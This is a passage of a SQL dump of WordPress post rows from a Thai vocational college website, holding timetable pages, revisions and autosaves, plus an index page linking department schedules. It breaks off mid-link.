(2312, 4, '2018-05-06 22:49:26', '2018-05-06 15:49:26', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาสังคมศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%a1%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9', '', '', '2018-05-06 22:49:26', '2018-05-06 15:49:26', '', 0, 'http://www.technicrayong.ac.th/?page_id=2312', 0, 'page', '', 0),
(2313, 4, '2018-05-06 22:49:26', '2018-05-06 15:49:26', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาสังคมศึกษา', '', 'inherit', 'closed', 'closed', '', '2312-revision-v1', '', '', '2018-05-06 22:49:26', '2018-05-06 15:49:26', '', 2312, 'http://www.technicrayong.ac.th/2312-revision-v1/', 0, 'revision', '', 0),
(2314, 4, '2018-05-06 22:49:34', '2018-05-06 15:49:34', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาสังคมศึกษา', '', 'inherit', 'closed', 'closed', '', '2312-autosave-v1', '', '', '2018-05-06 22:49:34', '2018-05-06 15:49:34', '', 2312, 'http://www.technicrayong.ac.th/2312-autosave-v1/', 0, 'revision', '', 0),
(2316, 4, '2018-05-06 22:50:13', '2018-05-06 15:50:13', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาภาษาไทย', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b9%84%e0%b8%97%e0%b8%a2', '', '', '2018-05-06 22:50:13', '2018-05-06 15:50:13', '', 0, 'http://www.technicrayong.ac.th/?page_id=2316', 0, 'page', '', 0),
(2317, 4, '2018-05-06 22:50:13', '2018-05-06 15:50:13', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาภาษาไทย', '', 'inherit', 'closed', 'closed', '', '2316-revision-v1', '', '', '2018-05-06 22:50:13', '2018-05-06 15:50:13', '', 2316, 'http://www.technicrayong.ac.th/2316-revision-v1/', 0, 'revision', '', 0),
(2318, 4, '2018-05-06 22:50:20', '2018-05-06 15:50:20', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาภาษาไทย', '', 'inherit', 'closed', 'closed', '', '2316-autosave-v1', '', '', '2018-05-06 22:50:20', '2018-05-06 15:50:20', '', 2316, 'http://www.technicrayong.ac.th/2316-autosave-v1/', 0, 'revision', '', 0),
(2321, 4, '2018-05-06 22:51:09', '2018-05-06 15:51:09', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาพลานามัย', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%a5%e0%b8%b2%e0%b8%99%e0%b8%b2%e0%b8%a1%e0%b8%b1%e0%b8%a2', '', '', '2018-05-06 22:51:09', '2018-05-06 15:51:09', '', 0, 'http://www.technicrayong.ac.th/?page_id=2321', 0, 'page', '', 0),
(2322, 4, '2018-05-06 22:51:09', '2018-05-06 15:51:09', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาพลานามัย', '', 'inherit', 'closed', 'closed', '', '2321-revision-v1', '', '', '2018-05-06 22:51:09', '2018-05-06 15:51:09', '', 2321, 'http://www.technicrayong.ac.th/2321-revision-v1/', 0, 'revision', '', 0),
(2323, 4, '2018-05-06 22:51:16', '2018-05-06 15:51:16', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาพลานามัย', '', 'inherit', 'closed', 'closed', '', '2321-autosave-v1', '', '', '2018-05-06 22:51:16', '2018-05-06 15:51:16', '', 2321, 'http://www.technicrayong.ac.th/2321-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2324, 4, '2018-05-06 22:51:35', '2018-05-06 15:51:35', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5%E0%B9%82%E0%B8%A3%E0%B8%87/\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD/\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2/\">แผนกวิชาช่างไฟฟ้ากำลัง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87/\">แผนกวิชาช่างอิเล็กทรอนิกส์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3/\">แผนกวิชาช่างก่อสร้าง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7/\">แผนกวิชาเครื่องมือวัดและควบคุม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5/\">แผนกวิชาปิโตรเคมี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2/\">แผนกวิชาเคมีอุตสาหกรรม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87/\">แผนกวิชาเทคโนโลยียาง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84%E0%B8%9E%E0%B8%B7%E0%B9%89/\">แผนกวิชาเทคนิคพื้นฐาน</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5/\">แผนกวิชาการบัญชี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94-%E0%B8%81%E0%B8%B2/\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8/\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD/\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3/\">แผนกวิชาการจัดการโลจิสติกส์</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%A8%E0%B8%B2%E0%B8%AA/\">แผนกวิชาคหกรรมศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B2%E0%B8%AB%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%82/\">แผนกวิชาอาหารและโภชนาการ</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%97/\">แผนกวิชาการท่องเที่ยว</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%82%E0%B8%A3%E0%B8%87%E0%B9%81%E0%B8%A3%E0%B8%A1/\">แผนกวิชาการโรงแรม</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5/\">สาขาวิชาเทคโนโลยีสารสนเทศ</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95/\">หมวดวิชาวิทยาศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%93%E0%B8%B4%E0%B8%95%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3/\">หมวดวิชาคณิตศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%9B/\">หมวดวิชาภาษาต่างประเทศ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AA%E0%B8%B1%E0%B8%87%E0%B8%84%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9/\">หมวดวิชาสังคมศึกษา</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%84%E0%B8%97%E0%B8%A2/\">หมวดวิชาภาษาไทย</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%A5%E0%B8%B2%E0%B8%99%E0%B8%B2%E0%B8%A1%E0%B8%B1%E0%B8%A2/\">หมวดวิชาพลานามัย</a></p>', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:51:35', '2018-05-06 15:51:35', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2325, 4, '2018-05-06 22:51:57', '2018-05-06 15:51:57', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5%E0%B9%82%E0%B8%A3%E0%B8%87/\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD/\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2/\">แผนกวิชาช่างไฟฟ้ากำลัง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87/\">แผนกวิชาช่างอิเล็กทรอนิกส์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3/\">แผนกวิชาช่างก่อสร้าง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7/\">แผนกวิชาเครื่องมือวัดและควบคุม</a></p>\r\n<p style=\"padding-left: 30px;\"><a 